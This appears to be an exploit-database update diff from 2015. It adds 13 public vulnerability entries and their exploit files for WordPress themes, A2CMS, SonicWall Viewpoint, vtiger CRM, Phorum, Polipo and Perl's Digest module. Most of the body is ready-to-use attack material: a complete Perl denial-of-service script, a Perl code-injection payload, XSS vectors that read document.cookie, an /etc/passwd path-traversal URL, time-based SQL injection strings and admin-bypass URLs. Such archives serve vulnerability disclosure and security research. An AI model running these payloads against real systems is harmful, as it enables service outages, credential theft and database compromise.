Update: 2015-02-28

13 new exploits

files.csv

@@ -32618,3 +32618,16 @@ id,file,description,date,author,platform,type,port
 36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0
 36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
+36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
+36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0
+36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0
+36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 'more' Object HTML Injection Vulnerability",2011-09-30,"Paul Davis",php,webapps,0
+36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0
+36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 'scheduleID' Parameter SQL Injection Vulnerability",2011-10-02,Rem0ve,php,webapps,0
+36197,platforms/php/webapps/36197.txt,"ezCourses admin.asp Security Bypass Vulnerability",2011-10-01,J.O,php,webapps,0
+36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 POST/PUT Requests HTTP Header Processing Denial Of Service Vulnerability",2011-10-01,"Usman Saeed",multiple,dos,0
+36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection Vulnerability",2011-10-02,anonymous,linux,remote,0
+36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 'referer' Header SQL Injection Vulnerability",2011-10-03,"Patroklos Argyroudis",php,webapps,0
+36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
+36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
+36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0

platforms/linux/remote/36199.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49911/info
+
+The Digest module for Perl is prone to a vulnerability that will let attackers inject and execute arbitrary Perl code.
+
+Remote attackers can exploit this issue to run arbitrary code in the context of the affected application.
+
+Digest versions prior to 1.17 are affected. 
+
+Digest->new("::MD5lprint 'ownaide\n';exit(1);"); 

platforms/multiple/dos/36198.pl

@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/49908/info
+
+Polipo is prone to a denial-of-service vulnerability.
+
+Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
+
+Polipo 1.0.4.1 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+# POLIPO 1.0.4.1 Denial Of Service
+# Disclaimer:
+# [This code is for Educational Purposes , I would Not be responsible
+for any misuse of this code]
+# Author: Usman Saeed
+# Company: Xc0re Security Research Group
+# Website: http://www.xc0re.net
+# DATE: [30/09/11]
+
+$host = $ARGV[0];
+$PORT = $ARGV[1];
+
+
+$evil = "PUT / HTTP/1.1\r\n".
+"Content-Length:1\r\n\r\n";
+
+
+use IO::Socket::INET;
+if (! defined $ARGV[0])
+{
+print "+========================================================+\n";
+print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
+print "+ Author [Usman Saeed]                                   +\n";
+print "+ Company [Xc0re Security Research Group]                +\n";
+print "+ DATE: [30/09/11]                                       +\n";
+print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
+print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
+print "+ I would Not be responsible for any misuse of this code]+\n";
+print "+========================================================+\n";
+
+
+
+
+
+exit;
+}
+
+
+$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
+PeerPort  => $PORT) || die "Cant connect to $host!";
+print "+========================================================+\n";
+print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
+print "+ Author [Usman Saeed]                                   +\n";
+print "+ Company [Xc0re Security Research Group]                +\n";
+print "+ DATE: [30/09/11]                                       +\n";
+print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
+print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
+print "+ I would Not be responsible for any misuse of this code]+\n";
+print "+========================================================+\n";
+
+
+
+
+
+print "\n";
+
+print "[*] Initializing\n";
+
+sleep(2);
+
+print "[*] Sendin evil Packet Buhahahahaha \n";
+
+send ($sock , $evil , 0);
+print "[*] Crashed :) \n";
+$res = recv($sock,$response,1024,0);
+print $response;
+
+
+
+exit;

platforms/php/webapps/36191.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49880/info
+
+The RedLine theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+RedLine theme prior to 1.66 are vulnerable. 
+
+http://www.example.com/?s="%20%3e%3c/link%3e%3cScRiPt%3ealert(123)%3c/ScRiPt%3e 

platforms/php/webapps/36192.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49883/info
+
+A2CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 
+
+http://www.example.com/js/index.php?f=../../../../etc/passwd 2011-09-28

platforms/php/webapps/36193.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49893/info
+
+The WP Bannerize plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WP Bannerize 2.8.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/wp-bannerize/ajax_sorter.phplimit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) 

platforms/php/webapps/36194.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49895/info
+
+ProjectForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ProjectForum 7.0.1.3038 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/<IMG """><SCRIPT>alert("Vulnerable")</SCRIPT>">

platforms/php/webapps/36195.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49896/info
+
+The Trending theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Trending theme 0.2 are vulnerable. 
+
+http://www.exmaple.com/?p=8&cpage=[xss] 

platforms/php/webapps/36196.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49906/info
+
+SonicWall Viewpoint is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Viewpoint 6.0 SP2 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3%20order%20by%201,%20%28 select%20case%20when%20%281=1%29%20%20then%201%20else%201*%28select%20table_name%20from%20information_schema.tables%29end%29=1 

platforms/php/webapps/36197.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/49907/info
+
+ezCourses is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
+
+Attackers could exploit the issue to bypass certain security restrictions and add or change the 'admin' account password. 
+
+http://www.example.com//ezCourses/admin/admin.asp?cmd=edit_admin&AdminID=1&Master=Master
+http://www.example.com/ezCourses/admin/admin.asp?cmd=add_admin&AdminID=1

platforms/php/webapps/36200.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49918/info
+
+Netvolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Netvolution 2.5.8 is vulnerable; other versions may also be affected. 
+
+The following example input is available:
+
+Referer: 1','0'); [SQL] 

platforms/php/webapps/36201.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/49920/info
+
+Phorum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Phorum 5.2.18 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phorum-5.2.18/admin/"</script><script>alert(document.cookie);</script></script>
+http://www.example.com/phorum-5.2.18/admin/index.php"</script><script>alert(document.cookie);</script></script>

platforms/php/webapps/36203.txt

@@ -0,0 +1,76 @@
+source: http://www.securityfocus.com/bid/49927/info
+
+vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
+
+/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url="><script>alert(/XSS/)</script>
+
+/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'"><script>alert(/XSS/)</script>&return_url=1
+
+/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10
+
+/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1
+
+/index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing
+
+/index.php?module=Potentials&action=ListView&date_closed=2006-01'><script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10
+
+/index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
+
+/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
+
+/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10
+
+/index.php?module=Potentials&action=ListView&leadsource=--None--'><script>alert(1)</script>&query=true&type=dbrd&viewname=10
+
+/index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1
+
+/index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37"><script>alert(/XSS/)</script>&parenttab=Marketin
+
+/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view
+
+/index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=
+
+/index.php?module=Potentials&action=ListView&sales_stage=Prospect'><script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10
+
+/index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1"%20onmouseover="alert(0)"%20a%3db%22&parenttab=My%20Home%20Page
+
+/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1
+
+/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10
+
+/index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
+
+/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1
+
+/index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10"'%20onmouseover=alert(/XSS/)%20x='&errormsg=
+
+/index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My
+
+/index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&pbss_edit=true
+
+/index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
+
+/index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
+
+/index.php?module=Settings&action=createrole&roleid=H2&parenttab=Settings&mode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
+
+index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
+   
+/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3d&mode=view
+
+/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns&return_action=index"%20style%3d"x%3aexpression(alert(1))"%20x="s&parenttab=Marketing&return_viewname=29
+
+/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&return_action=index&parenttab=Marketing&return_viewname=29
+
+/index.php?module=Settings&action=createnewgroup&returnaction=listgroups"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Settings&mode=edit&groupId=2
+
+/index.php?module=Settings&action=RoleDetailView&roleid=H2"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s
+
+/index.php?module=Settings&action=ModuleManager&module_update=Step1&src_module=Mobile3"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Setting
+
+/index.php?action=index&module=Calendar&view=week"%20style%3d"xss%3aexpression(alert(1))"&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
+

platforms/php/webapps/36204.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49927/info
+ 
+vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
+
+/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parenttab=MyHome Page"><script>alert(0)</script>&jt=
+
+/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=